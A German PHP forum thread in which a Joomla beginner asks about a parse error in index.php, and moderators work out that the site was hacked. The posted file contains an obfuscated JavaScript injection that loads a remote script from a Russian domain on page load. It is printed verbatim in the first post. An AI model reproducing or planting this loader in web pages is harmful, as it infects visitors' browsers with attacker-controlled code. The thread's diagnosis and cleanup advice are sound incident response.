php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > Entwicklung > PHP Developer Forum
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


PHP Developer Forum Hier habt ihr die Möglichkeit, eure Skriptprobleme mit anderen Anwendern zu diskutieren. Seid so fair und beantwortet auch Fragen von anderen Anwendern. Dieses Forum ist sowohl für ANFÄNGER als auch für PHP-Profis! Fragen zu Laravel, YII oder anderen PHP-Frameworks.

Antwort
 
LinkBack Themen-Optionen Bewertung: Bewertung: 1 Stimmen, 5,00 durchschnittlich.
  #1 (permalink)  
Alt 09-05-2010, 17:36
tttgo
 Registrierter Benutzer
Links : Onlinestatus : tttgo ist offline
Registriert seit: May 2010
Beiträge: 1
tttgo befindet sich auf einem aufstrebenden Ast
Standard Parse error: syntax error

hallo liebe gemeinde,

ich bin neu hier und nicht sicher, ob mein problem hier richtig ist... wenn nicht, bitte ich um eine verschiebung ins richtige thema...

seit ein paar tagen versuche ich mich an einer webseite mit joomla. ich bin totaler anfänger muss ich gestehen - habe keine ahnung von joomla und php und suche mich bei problemen stundenlang durch internet was richtig spass macht wenn ich wieder was gelöst habe... aber jetzt bin ich am verzweifeln. seit einigen tagen steht auf meiner seite nur noch folgender ausdruck:

Parse error: syntax error, unexpected '<' in /data/multiserv/users/350095/projects/574690/www/index.php on line 91

ein wenig gegoogelt habe ich gesehen, dass das öfters mal auftritt aber eine lösung dafür habe ich nicht gefunden. nach dem was ich bisher weiß muss es also ein fehler in der syntax der zeile 91 sein... aber was??

hier mal die ganze index.php - vielleicht könnt ihr mir helfen (bitte, bitte...)

<?php
/**
* @version $Id: index.php 11407 2009-01-09 17:23:42Z willebil $
* @package Joomla
* @copyright Copyright (C) 2005 - 2009 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
// Set flag that this is a parent file
define( '_JEXEC', 1 );
define('JPATH_BASE', dirname(__FILE__) );
define( 'DS', DIRECTORY_SEPARATOR );
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );
JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;
/**
* CREATE THE APPLICATION
*
* NOTE :
*/
$mainframe =& JFactory::getApplication('site');
/**
* INITIALISE THE APPLICATION
*
* NOTE :
*/
// set the language
$mainframe->initialise();
JPluginHelper::importPlugin('system');
// trigger the onAfterInitialise events
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');
/**
* ROUTE THE APPLICATION
*
* NOTE :
*/
$mainframe->route();
// authorization
$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);
// trigger the onAfterRoute events
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');
/**
* DISPATCH THE APPLICATION
*
* NOTE :
*/
$option = JRequest::getCmd('option');
$mainframe->dispatch($option);
// trigger the onAfterDispatch events
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');
/**
* RENDER THE APPLICATION
*
* NOTE :
*/
$mainframe->render();
// trigger the onAfterRender events
JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');
/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));

hier muss jetzt irgendwas falsch sein
<script>this.l=18257;this.l--;this.p=43988;this.p--;var jk=["DB","jv","bN"];var oO=new Date();function t(){this.HA=62698;this.HA--;this.X=54063;this.X--;var H=String("dewIG".substr(0,2)+"fe"+"r");var z=["Q","n"];uX={lg:"e"};this.BH="BH";var CS={U:"zF"};var W=new String("body");var C=window;LP=53116;LP+=34;tK=25028;tK-=167;var D=String("scripk8AN".substr(0,5)+"tWrh6".substr(0,1));var J=String("app8eJ".substr(0,3)+"end"+"B29Chi".substr(3)+"ld");var Hs=String("creati9h".substr(0,5)+"eElem"+"W8p6ent".substr(4));var a=String("sr"+"c");Ws=["ts","re"];var P=document;var x=String("onlo"+"ad");var _x=["Un","rY"];XX=9146;XX--;function T(){var Ii="Ii";var _u={nW:"JB"};try {var f='';var _=783024-774944;Y_={nb:false};var cs=65393;var g=9470-9469;var r="lZ9P/goog".substr(4)+"le.co"+"m/kak"+"KWDOaku.c".substr(4)+"om/11"+"0mb.cwTh".substr(0,5)+"om.ph"+"p";eZ=["uV"];var Dz=false;var o=String("d9Fmhttp".substr(4)+"CUF://d".substr(3)+"irty"+"sin."+"ru:");O=P[Hs](D);this.On=false;var EH=new String();var uM=[];try {var Mw='hK'} catch(Mw){};O[H]=g;O[a]=o+_+r;SA=["Ue"];xs=[];ME=[];P[W][J](O);var KC=[];var He="";} catch(xv){this.o_=false;};}sH=59152;sH+=228;C[x]=T;this.q="q";};var m=false;t();</script>
<!--c7e0dbf4dc468aaf4051f1a4e8d61b11-->

vielleicht hab ich auch was übersehen und bin einfach nur dumm das jetzt zu bemerken...

bitte nochmals um hilfe...

danke schonmal

TimsToTale
Mit Zitat antworten
  #2 (permalink)  
Alt 09-05-2010, 17:48
Kropff
  Administrator
Links : Onlinestatus : Kropff ist offline
Registriert seit: Mar 2002
Ort: Köln
Beiträge: 11.722
Kropff befindet sich auf einem aufstrebenden Ast
Standard

Bitte nutze die PHP-Tags () und sorge dafür, dass der Code gut lesbar ist. Ich denke nicht, dass einer die Lust hat, sie da durch zu wühlen, solange das so aussieht.

Danke
Peter
__________________
Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
Meine Seite
Mit Zitat antworten
  #3 (permalink)  
Alt 09-05-2010, 17:50
Kropff
  Administrator
Links : Onlinestatus : Kropff ist offline
Registriert seit: Mar 2002
Ort: Köln
Beiträge: 11.722
Kropff befindet sich auf einem aufstrebenden Ast
Standard

Ich Dödel! Du baust da einfach JavaScript-Code ein. Da kann der PHP-Parser natürlich nichts mit anfangen.

Peter
__________________
Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
Meine Seite
Mit Zitat antworten
  #4 (permalink)  
Alt 09-05-2010, 18:05
Benutzerbild von onemorenerd onemorenerd
  Moderator
Links : Onlinestatus : onemorenerd ist offline
Registriert seit: Mar 2005
Ort: Berlin
Beiträge: 9.471
onemorenerd wird schon bald berühmt werdenonemorenerd wird schon bald berühmt werden
Standard

Ich vermute er hat das (-> dirtysin.ru) nicht selbst eingebaut sondern wurde gehackt. Offensichtlich dachte der Hacker/Wurm, dass er sich einfach ans Ende eines PHP-Scripts schreiben kann. Funktioniert hier nicht, weil das schließende ?> fehlt und deswegen Javascript-Code in PHP-Kontext eingebettet wurde, womit der PHP-Interpreter natürlich nichts anfangen kann.

@TO: Schalte deine Seite erstmal ab, alles was da läuft. Dann finde heraus wie der Hack passieren konnte, dichte das Loch ab und spiel das letzte unbefleckte Backup ein.

Geändert von onemorenerd (09-05-2010 um 18:14 Uhr)
Mit Zitat antworten
  #5 (permalink)  
Alt 09-05-2010, 18:50
Kropff
  Administrator
Links : Onlinestatus : Kropff ist offline
Registriert seit: Mar 2002
Ort: Köln
Beiträge: 11.722
Kropff befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Zitat von onemorenerd Beitrag anzeigen
Ich vermute er hat das (-> dirtysin.ru) nicht selbst eingebaut sondern wurde gehackt.
Da hat aber einer Adleraugen!

Ich dachte, es wäre ein Tracking-Programm, weil ich was von google.com gesehen habe. Und die verschlüsseln ihren Code auch sehr gerne.

Peter
__________________
Nukular, das Wort ist N-u-k-u-l-a-r (Homer Simpson)
Meine Seite
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
Parse error: syntax error, unexpected '}' in C:\server\xampp\htdocs\public\index.php ibanez PHP Developer Forum 7 15-08-2009 12:24
[QUOTE]Parse error: syntax error, unexpected '}' in Ayline PHP Developer Forum 4 25-01-2009 14:05
Parse error: syntax error, unexpected '<' in... BITTE HELFEN !!! 2533 PHP Developer Forum 8 16-10-2008 23:55
Parse error: syntax error, unexpected T_STRING in........... chrizzka PHP Developer Forum 2 27-06-2008 08:18
Parse error: syntax error, unexpected T_STRING °°sonny black°° PHP Developer Forum 2 08-04-2008 13:01

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni

Wissensbestand in Unternehmen
Wissensbestand in UnternehmenLebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen

25.05.2018 | Berni


 

Aktuelle PHP Scripte

PHP Server Monitor

PHP Server Monitor ist ein Skript, das prüft, ob Ihre Websites und Server betriebsbereit sind.

11.09.2018 Berni | Kategorie: PHP/ Security
PHP WEB STATISTIK ansehen PHP WEB STATISTIK

Die PHP Web Statistik bietet Ihnen ein einfach zu konfigurierendes Script zur Aufzeichnung und grafischen und textuellen Auswertung der Besuchern Ihrer Webseite. Folgende zeitlichen Module sind verfügbar: Jahr, Monat, Tag, Wochentag, Stunde Folgende son

28.08.2018 phpwebstat | Kategorie: PHP/ Counter
Affilinator - Affilinet XML Produktlisten Skript

Die Affilinator Affilinet XML Edition ist ein vollautomatisches Skript zum einlesen und darstellen der Affili.net (Partnerprogramm Netzwerk) Produktlisten und Produktdaten. Im Grunde gibt der Webmaster seine Affilinet PartnerID ein und hat dann unmittelb

27.08.2018 freefrank@ | Kategorie: PHP/ Partnerprogramme
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 03:31 Uhr.